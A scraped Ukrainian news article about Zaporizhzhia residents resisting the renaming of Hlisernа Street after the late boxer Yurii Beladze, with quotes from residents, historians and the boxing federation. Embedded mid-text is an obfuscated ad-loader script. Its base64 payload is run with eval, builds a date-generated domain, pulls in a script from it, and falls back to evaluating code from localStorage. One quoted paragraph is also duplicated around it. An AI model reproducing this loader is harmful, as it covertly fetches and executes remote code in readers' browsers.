В Запоріжжі місцеві мешканці виступили проти перейменування вулиці

Під приводом декомунізації представники запорізької міської ради пропонують змінити назву вулиці в Олександрівському районі з Глісерної на Беладзе. Але жителі вулиці стверджують, що такої потреби немає.

Про це жителі вулиці Глісерної повідомили кореспондентам Суспільного, які досліджували питання.

На вулиці Глісерній розташовані 10 житлових будинків, низка підприємств і центральний парк культури та відпочинку «Дубовий гай». Назва не змінювалася 90 років, втім вулиця має давнішу історію, розповідає місцевий мешканець Євген Мішин.


Євген Мішин. Фото: Суспільне Запоріжжя

«Глісерна вона була при німцях, які побудували це місце, воно називалося Шенвізе, до Запоріжжя, до Олександрівська, це історичний факт. Навіщо змінювати корінну назву? Тут ще мешкають з судноремонтного заводу робітники, їхні діти, онуки й також моряки”, — каже Євген.


Олександр Журавльов. Фото: Суспільне Запоріжжя

“Треба піти від радянської епохи та всього, пов’язаного з тим часом і залишити в минулому. Але Глісерна, мені до вподоби це найменування”, — додає місцевий мешканець Олександр Журавльов.

За словами голови правління ОСББ «Глісерна, 18» Ірини Мішиної, про ініціативу з перейменування вона дізналася з протоколу засідання робочої групи у міській раді. Каже — здивувалася, адже у попередньому списку перейменувань вулиця Глісерна не значилась. Можливі зміни обурили мешканців будинку, зазначає голова ОСББ:


Ірина Мішина. Фото: Суспільне Запоріжжя

«Немає підстави для перейменування, це по-перше. По-друге, ці будинки були збудовані робітниками річкового і морського порту. Це історична назва, яка з’явилася ще в 30-х роках. Ми будемо боротися за те, щоб відстояти свою назву”.

Думку про те що Глісерна не підпадає під процес “дерусифікації” поділяє і краєзнавець Роман Акбаш. Він підкреслює, що ця назва немає ані російського, ані радянського підтексту.


Роман Акбаш. Фото: Суспільне Запоріжжя

«Глісер — це різновид моторного човна. Глісерна, це ж не радянська, не російська. Там все логічно, бо там судноремонтний завод, річковий вокзал, ще з часів Олександрівська там була пристань. Звісно, якісь кошти будуть йти на ті ж вуличні таблички з бюджету, так навіщо ускладнювати роботу?”, — каже краєзнавець.

Однак, учасник міської робочої групи, яка займається перейменуванням вулиць, історик Віктор Філас вбачає у назві Глісерна відбиток радянської епохи.

“Тут треба говорити про глісер, як судно, і треба говорити про затоплення Великого Лугу. В рамках Російської Імперії — це був такий осередок спротиву, один з маркерів етнічності українців. Коли затопили плавні, почала формуватися нова радянська ідеологія, нова ідентичність, перемога людини над природою». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Однак, учасник міської робочої групи, яка займається перейменуванням вулиць, історик Віктор Філас вбачає у назві Глісерна відбиток радянської епохи.

“Тут треба говорити про глісер, як судно, і треба говорити про затоплення Великого Лугу. В рамках Російської Імперії — це був такий осередок спротиву, один з маркерів етнічності українців. Коли затопили плавні, почала формуватися нова радянська ідеологія, нова ідентичність, перемога людини над природою».


Віктор Філас. Фото: Суспільне Запоріжжя

«Глісер тут виступав в цьому плані таким ідеологічним тропом. Воно було цим тропом візуальним, ідеологічним, як у літературі наративним тропом, візуальним тропом у мистецтві, всюди був цей глісер”, — вважає Віктор Філас.

У міськраді пропонують назвати вулицю Глісерну ім’ям почеcного громадянина Запоріжжя Юрія Беладзе. Боксер народився в Олександрівському районі міста. Тут заснував дитячо-юнацьку спортивну школу з боксу, яка існує вже 55 років. Був арбітром міжнародної категорії, пішов з життя у 2017 році.


Юрій Беладзе. Фото Ошана Беладзе

Ініціатива перейменування Глісерної належить міській федерації боксу, розповідає почесний президент федерації — племінник Юрія Беладзе, Ошан Беладзе.


Ошан Беладзе. Фото: Суспільне Запоріжжя

“Юрій Юханович зробив великий внесок у розвиток Запорізького краю та саме міста Запоріжжя. Він був громадським діячем, займався вихованням дітей, юнаків. Уцентральному парку Дубовий гай відбуваються міжнародні, всеукраїнські турніри, чемпіонати України, Кубки України, і найголовніше — пам’ятні турніри Юрію Юхановичу Беладзе”, — каже Ошан Беладзе.

Чи буде змінена назва вулиці Глісерної, вирішуватиме спеціальна комісія міськради та під час проведення громадських слухань. Вже після цього, остаточне рішення ухвалюватимуть депутати під час сесії міської ради — пояснює Віктор Філас.

Всього у Запоріжжі планують перейменувати понад 300 вулиць, які пов’язані з періодом Російської імперії чи радянською добою.

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/v-zaporizhzhi-mistsevi-meshkantsi-vistupili-proti-perejmenuvannya-vulitsi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top